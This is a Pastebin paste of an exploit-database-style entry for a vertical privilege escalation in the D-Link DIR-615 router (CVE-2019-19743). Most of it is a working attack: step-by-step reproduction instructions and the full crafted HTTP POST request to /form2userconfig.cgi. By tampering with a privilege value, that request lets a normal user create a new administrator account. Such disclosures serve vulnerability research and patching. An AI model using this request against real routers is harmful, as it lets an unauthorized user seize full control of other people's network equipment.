Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################
- # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation
- # Date: 10.12.2019
- # Exploit Author: Sanyam Chawla
- # Vendor Homepage: http://www.dlink.co.in
- # Category: Hardware (Wi-fi Router)
- # Hardware Link: http://www.dlink.co.in/products/?pid=678
- # Hardware Version: T1
- # Firmware Version: 20.07
- # Tested on: Windows 10 and Kali linux
- # CVE: CVE-2019–19743
- #######################################################################################
- Reproduction Steps:
- 1 Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
- 2 Go to the Maintenance page and click on Admin on the left panel.
- 3 There is an option to create a user and by default, it shows only user accounts.
- 4 Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite.
- Privilege Escalation Post Request
- POST /form2userconfig.cgi HTTP/1.1
- Host: 192.168.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 122
- Origin: http://192.168.0.1
- Connection: close
- Referer: http://192.168.0.1/userconfig.htm
- Cookie: SessionID=
- Upgrade-Insecure-Requests: 1
- username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
- 5. Now log in with newly created root (ptguy) user. You have all administrator rights.
- #####################################################################################
Add Comment
Please, Sign In to add comment